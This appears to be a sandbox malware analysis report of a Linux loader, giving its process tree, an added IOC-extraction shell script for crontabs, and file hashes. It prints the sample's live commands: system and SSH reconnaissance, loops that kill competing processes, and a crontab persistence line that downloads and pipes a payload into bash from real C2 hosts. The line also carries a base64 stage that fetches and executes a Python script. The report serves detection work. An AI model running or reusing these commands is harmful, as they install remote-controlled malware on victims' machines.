/usr/bin/nohup: nohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d "&"
  PID: 2310
/tmp/bin.64: /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d "&"
  - Checks CPU configuration
  - Checks hardware identifiers (DMI)
  - Reads CPU attributes
  - Reads hardware information
  - Enumerates kernel/hardware configuration
  - Writes file to tmp directory
  PID: 2310
  /bin/sh: sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    - Attempts to change immutable files
    PID: 2351
    /usr/bin/whoami: whoami
      PID: 2362
    /usr/bin/hostname: hostname
      PID: 2363
    /usr/bin/grep: grep -c "^processor" /proc/cpuinfo
      - Checks CPU configuration
      PID: 2364
  /bin/sh: sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    PID: 2381
    /usr/bin/awk: awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      PID: 2383
    /usr/bin/ps: ps -A "-ostat,ppid"
      - Reads CPU attributes
      - Reads runtime system information
      PID: 2382
    /usr/bin/id: id -u
      PID: 2389
    /usr/bin/grep: grep -v grep
      PID: 2392
    /usr/bin/grep: grep /etc/cron
      PID: 2391
    /usr/bin/ps: ps x
      - Reads CPU attributes
      - Reads runtime system information
      PID: 2390
  /bin/sh: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    PID: 2400
    /usr/bin/id: id -u
      PID: 2401
    /usr/bin/awk: awk "{if(\$3>30.0) print \$2}"
      PID: 2407
    /usr/bin/grep: grep -v /usr/sbin/httpd
      PID: 2406
    /usr/bin/grep: grep -v -- "-bash[[:space:]]*\$"
      PID: 2405
    /usr/bin/grep: grep -v grep
      PID: 2404
    /usr/bin/ps: ps aux
      - Reads CPU attributes
      - Reads runtime system information
      PID: 2403
  /bin/sh: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
    PID: 2414
    /usr/bin/id: id -u
      PID: 2415
/usr/bin/hostname: hostname -I
  - Attempts to change immutable files
  PID: 2354
/usr/bin/awk: awk "{print \$1}"
  PID: 2356
/usr/bin/awk: awk "{print \"-\"\$2}"
  PID: 2361
/usr/bin/head: head -n 1
  PID: 2360
/usr/bin/grep: grep "Port "
  PID: 2359
/usr/bin/cat: cat /etc/ssh/sshd_config
  PID: 2358
/usr/bin/sed: sed -e "s/\$//"
  PID: 2370
/usr/bin/sed: sed -e "s/^ *//"
  PID: 2369
/usr/bin/cut: cut -d: -f2
  PID: 2368
/usr/bin/grep: grep -m 1 "model name" /proc/cpuinfo
  - Checks CPU configuration
  PID: 2367
/usr/bin/awk: awk "{print \$1}"
  PID: 2373
/usr/bin/awk: awk "{print \$4}"
  PID: 2376
/usr/bin/awk: awk "{print \$4}"
  PID: 2379
/usr/bin/wc: wc -l
  PID: 2421
/usr/bin/awk: awk "{if(\$3>30.0) print \$2}"
  PID: 2420
/usr/bin/grep: grep -- "-bash[[:space:]]*\$"
  PID: 2419
/usr/bin/grep: grep -v grep
  PID: 2418
/usr/bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
  PID: 2417
/usr/bin/bash: bash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
  PID: 2548
  /usr/bin/crontab: crontab -
    - Creates/modifies Cron job
    PID: 2550
/usr/bin/ss: ss -ant
  PID: 2551
/usr/bin/ss: ss -ant
  PID: 2552
/usr/bin/ss: ss -ant
  PID: 2553
/usr/bin/bash: bash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
  PID: 2560
  /usr/bin/crontab: crontab -
    - Creates/modifies Cron job
    PID: 2562
/usr/bin/ss: ss -ant
  PID: 2563
/usr/bin/ss: ss -ant
  PID: 2564
/usr/bin/ss: ss -ant
  PID: 2565
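The crontab entry installed twice above is the loader's second persistence channel: every ten minutes it fetches http://dw.c4kdeliver.top:443/2.gif with whichever of curl, wget or lwp-download is present and pipes it into bash, then runs a base64-encoded stage. Decoding that blob gives a python/python2 urllib one-liner that downloads and exec()s /d.py from 185.172.128.146 (port 443 in the first attempt, port 80 in the fallback), so the second C2 host never appears in clear text in the crontab. The script below is an added example, not the report's output and not the sample's code: it reads crontab text on stdin, decodes any `echo <base64> | base64 -d` stage first, and prints the URLs and hosts referenced. The embedded sample is the crontab line from the report above; the function names and the --demo/--stdin flags are this example's own.

```shell
#!/bin/sh
# Added IOC extraction script (not part of the tria.ge report or of the
# sample). Reads crontab text on stdin, decodes any "echo <base64> |
# base64 -d" stage it contains, and prints the URLs and hosts referenced,
# so a second-stage loader hidden inside the entry shows up alongside the
# plain-text one. Function and variable names are this script's own.
#
# Usage: crontab -l | sh cron_iocs.sh --stdin
#        sh cron_iocs.sh --demo        (runs on the sample below)

# The crontab entry the report above shows being installed twice with
# "echo '...' | crontab -" (copied from the report, base64 stage intact).
SAMPLE_CRONTAB='*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash'

# Decode each "echo <blob> | base64 -d" stage found on stdin; one decoded
# command per output line. For the sample this yields a python/python2
# one-liner that fetches and exec()s /d.py from 185.172.128.146.
decode_b64_stages() {
    grep -oE 'echo +[A-Za-z0-9+/=]{16,} *\| *base64 -d' \
        | sed -E 's/^echo +//; s/ *\| *base64 -d$//' \
        | while read -r blob; do
              printf '%s' "$blob" | base64 -d 2>/dev/null || true
              printf '\n'
          done
}

# Every URL in the crontab text on stdin, including those that only appear
# after base64 decoding, de-duplicated.
extract_cron_iocs() {
    text=$(cat)
    {
        printf '%s\n' "$text"
        printf '%s\n' "$text" | decode_b64_stages
    } | grep -oE 'https?://[A-Za-z0-9._-]+(:[0-9]+)?(/[A-Za-z0-9._/-]*)?' \
      | sort -u
}

# Just the hostnames / IPs, ready for a DNS or firewall log search.
extract_cron_hosts() {
    extract_cron_iocs | sed -E 's#^https?://##; s#[:/].*$##' | sort -u
}

case "${1:-}" in
    --demo)  printf '%s\n' "$SAMPLE_CRONTAB" | extract_cron_iocs ;;
    --stdin) extract_cron_iocs ;;
esac
```

Run it against every user's crontab, not only root's (`for u in $(cut -d: -f1 /etc/passwd); do crontab -l -u "$u" 2>/dev/null; done | sh cron_iocs.sh --stdin`), because the loader installs the entry as whichever user it runs as. Note that both download URLs use plain http on port 443; a proxy or IDS rule that assumes TLS on 443 will not see these requests as the HTTP they are, so match on the host names and the URI paths rather than on the port.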
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 182B
  MD5: 4847d0ba37990c8b3e81b82600e3759f
  SHA1: 25efb8e596a1cbcc0131b7ed85482b6c86e3fbd0
  SHA256: 8f56f290451bc9a85fbcc7bd6cb605973ebb12412920d050d8be0d4666c8f73f
  SHA512: 899ab30f716baf622cbc2d1c5dafd6a955df2583ec844bc7480257ee0eae0eef94564bd79c17f565d2d3c46a8697bcf7dea90fc03be1b1da2574a70635e93ed3
- Filesize: 179B
  MD5: 7085dc81c0f71aa007f9aa2753f33562
  SHA1: 5ebe6f7d0093ff39eb9bb1c5531b996ad89954c2
  SHA256: 26e311de204b3727c0d0a282ca88d34e02e9e3b33f7f164a890152cc2ecdd9d7
  SHA512: cdbe6288a734b1cf0b8a36d7a093eddf74d9298beb1c24cf18d7182fbbbfc7b1e0cf11a69dd30694e7f156bb94f9916d78c646b7127141803db6288f5568350b
- Filesize: 334B
  MD5: 5bdb87c18d322065c21c2b64511e8c9a
  SHA1: 95805bfe6a2acd6c93e7d2872276bb47b66ebb47
  SHA256: 45c90566fe2215656c7d2dd32cb216e276bbaf0f3992a92014dbf3a61113dc62
  SHA512: 290a7c8f5a62a713fe980cae9f459198db93e04ed0f0162c06b9d4645cfbb85765172b9cc34a56ff607dd1ed4c0a217cd22781058d2f0ac73e2f057f60a3ec6a
- Filesize: 367B
  MD5: 7240970d2eaf113cbd0f8b3d638f3030
  SHA1: 6f2fe902906eeae017a2d219d1fe212250e7eda0
  SHA256: 90d6f965fe33845035f5da674560a043f9cfbb992c715394a63c38bc96c11d75
  SHA512: 9a0d03e573b37746b719fd4bcf69be12e46798ebfff72b3cdd7e9ff367a6d89bdebaa128b61d3a5536495cd962fd670fe6d782610b04ed1e208598a9a606d9d7
- Filesize: 364B
  MD5: c05ea7b436c52279a74eea5fc066a6c4
  SHA1: ee6d10909a422d536d4f501865c3ac924f7ffded
  SHA256: e81798f161ea7ff564203e9ab48a00f0e26b4f8c3fd43f18f187870b16f44e40
  SHA512: 163e1cb3751b4e5561e8c6c6f85a7dafe3ae7fbcf79b814ab8255788810549b997999f0d1758f70481c28863133ccadf9b172f37e20a1c0d0bdefe17f3fc30f1
- Filesize: 359B
  MD5: ca72b64121de5e1f38dc84abbdeb6866
  SHA1: 416e2b1567af3cfb1d7747fbd57932c67c771b37
  SHA256: fac4fd7d3c86c91f2111ca93704d45e066e8a8f4dc878a6637849db0e0b4b1f9
  SHA512: 6fb2a33111f711c5bc8b171e4c6e39b57e7ae8d1e2da10775fbf0ea3d1279d8b9b327cd5ec4c5c51fe84adc3070490051fe5b9be0f6f38934a372b19f9b20f64
- Filesize: 4B
  MD5: 571d3a9420bfd9219f65b643d0003bf4
  SHA1: e74f0f1f0934fe0ab10af864e8ea13c69913a897
  SHA256: d3fb4415d5c03cf6544957b7a7a66041c95b447ee149f0e4479f8ac2e48969ea
  SHA512: 5244a768479585826c67a30f83372d12012b38681e727070674ca4c477308b8e78ac0f70ce9781b99614ac336aa4382af0635cb2ce35218e633152a9147efbb9
- Filesize: 2.3MB
  MD5: 915aec68a5b53aa7681a461a122594d9
  SHA1: 38be55f1fc4ce1cb5438236abc5077019e5e1cdf
  SHA256: e2c3e81aa24b20ac71147340adc1eaedf077ad00e4a2359e3db47b166cf5411a
  SHA512: 668369810060738e38bc7ed2ad4ff4fbeb8bc99fb46e080423972982b486b5e5e6bab6fc73ede0ee2e5638c8f5fcb1e8ea764a7b6bfb9c6086f238ec5cade8d0
- Filesize: 371B
  MD5: 10dc79941de4d72c5353f28974f31c92
  SHA1: 32792bf77863ef0a3572cef7aee83da17fbaf3a4
  SHA256: dee46bab77e9dc26abb4062c6df75d05feb19034754908832271215045b2de5a
  SHA512: f76c957c2cbdace6310237668863614f3012abeeb02e1298e01961fbeb030c3a109dea561dab3ff719b49670e73c4ab95a0cf0ee9b89e521c54410d45f5efff1
- Filesize: 368B
  MD5: ba411ff974701246bd51184dc62dff03
  SHA1: fde92553185f2f3e17be8500a02deeebdff5344f
  SHA256: a0d7d55b25cefb4ea12b474532bee974916052fae36ccb30657d78b21004e1fa
  SHA512: 02463506f02c3bc5d06439b033b1c01c977414ab8b3eb4eb5b306b6a098f61cbdced3101b17afbb9d484fd93d37d4502f4c4270f17e5d7c61de2db532c7d17bc
- Filesize: 655B
  MD5: eee52464f62044fe929e556c8ef79eef
  SHA1: 0123382a6e23946233c4d1c52a23856044964c08
  SHA256: e8de9c4fb42bce0681f53438b099ebb9d6dddca2cb0fa75964f10d6a92c019b3
  SHA512: 8d1322502d3e251e9d39104a9772fca736b22fcbd67297d44d7d109c993041f29c71b59ad01b6c9fbbed883606722815142bb058b5d01454abe5afb1eaf45f69
- Filesize: 655B
  MD5: 6ad5d62b8195060e1c939b97b1205f98
  SHA1: 211ed8e015100b17dad9be6450791c8aa6fb24db
  SHA256: 79a07ac481ce6ac013275adc6111c7eab057752f87fe1c8bd38d63af80ee5014
  SHA512: 7caef4d14c84ad28d2495dce2e84fbaefda579c8d35e20c004609e55910aef6a7b5a698089b753be1502acc17cd91082280f72f9db763b4f10e72b7e1c61232e
- Filesize: 655B
  MD5: 038438b3d8c6ede3ce6330da50a13f0c
  SHA1: c17a487458bca71307d3b1b572189ee395fde115
  SHA256: c0b8292daaf3c4bba6b1474763d623c5f46291548a4b74a3542a8af218076e4d
  SHA512: edc5caf8736a46d1ff0128eb05a7c2730a98a7bb03377c704e92b6aa383e4202a3abcfab6e1953f419ca2bcadb00299608d6a483835703a415fc162585bd8b3e
- Filesize: 655B
  MD5: 8c5e0af21e6c8792a26f7d6ce8d1f92e
  SHA1: 5e3e16fc0ef8f6e0bcedd41d53a5ab1f239b48db
  SHA256: 390e03ce1ef008b8ed38ebbfad5e2ebba70f5d0fd160859327722aa95d3a709d
  SHA512: 65ae20fc7e2794321b62f21b39e94ae854353a86326b93448f1ce8e4305c2fb6e1deebc6ef4fb1fe09f0e13592991cd54fb789d3cddf4ecefcdedff543197b21
- Filesize: 653B
  MD5: 5384381ab5c2f4c9374284daf4725f09
  SHA1: 44838a4063d4929c3d0eb4671f220897beb8c12a
  SHA256: c112eb5376080ca468abd775e8aae08f9c11510f75d92011c29cf6fd54d7cfce
  SHA512: 2ec46ccebe1e75bd7e7ece4730e69e4cda80e31a1803fa1251437345cbc9c8486e6293909b856e876c4422495073de1f982383722fbe0099fcb228598964e998